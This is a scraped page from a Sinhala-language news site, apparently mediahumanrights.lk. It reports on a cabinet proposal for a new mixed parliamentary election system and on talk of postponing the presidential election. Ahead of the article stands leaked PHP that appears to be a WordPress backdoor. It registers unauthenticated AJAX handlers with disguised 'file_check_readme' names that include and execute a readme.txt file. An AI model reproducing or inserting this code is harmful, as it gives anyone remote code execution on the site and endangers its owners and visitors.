if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } නව ඡන්ද ක‍්‍රමයකට කැබිනට් යෝජනාවක්.. ජනාධිපතිවරණයත් කල් යයි..? - mediahumanrights.lk
mediahumanrights.lk
News Political

නව ඡන්ද ක‍්‍රමයකට කැබිනට් යෝජනාවක්.. ජනාධිපතිවරණයත් කල් යයි..?

පාර්ලිමේන්තු මැතිවරණ ක්‍රමය වෙනස් කිරීමට රජය සූදානම් වෙමින් ඇති බව ඩේලි මිරර් පුවත්පත වාර්තා කරයි.

ඒ අනුව නව පාර්ලිමේන්තුව මැතිවරණ ක්‍රමයක් යටතේ මන්ත්‍රීවරුන් තෝරා පත් කර ගැනීමට අනුමැතිය ඉල්ලා අධිකරණ ඇමැති විජයදාස රාජපක්ෂ මහතා කැබිනට් යෝජනාවක් ඉදිරිපත් කර තිබේ.

යෝජනාව අනුව සෘජු මහජන ඡන්දයෙන් මන්ත්‍රීවරුන් 160 දෙනෙකු හා සමානුපාත ක්‍රමය යටතේ 65 දෙනෙකු පත් කිරීමට නියමිතව ඇත.

කෙසේ වෙතත් මෙම පනත හරහා ලබන වසරේ පැවැත්වීමට නියමිත ජනාධිපතිවරණය ඇතුළු ජාතික මැතිවරණ කල් දැමීමේ උත්සාහයක් ඇති බව දේශපාලන කවයන් තුළ සාකච්ඡා වෙමින් ඇතැයි ද වාර්තාවේ දැක්වෙයි.

Related posts

ලොව හොඳම සංචාරක ගමනාන්තය යන නාමය ශ‍්‍රී ලංකාවට අහිමි වෙයි

Shiran Viraj

පොලිතීන් ගැන රජයේ අලුත්ම තීරණයට නිෂ්පාදකයින්ගේ විරෝධය

Shiran Viraj

එජාප ලයිස්තුවෙන් හෙළඋරුමය හැලෙයි !

Shiran Viraj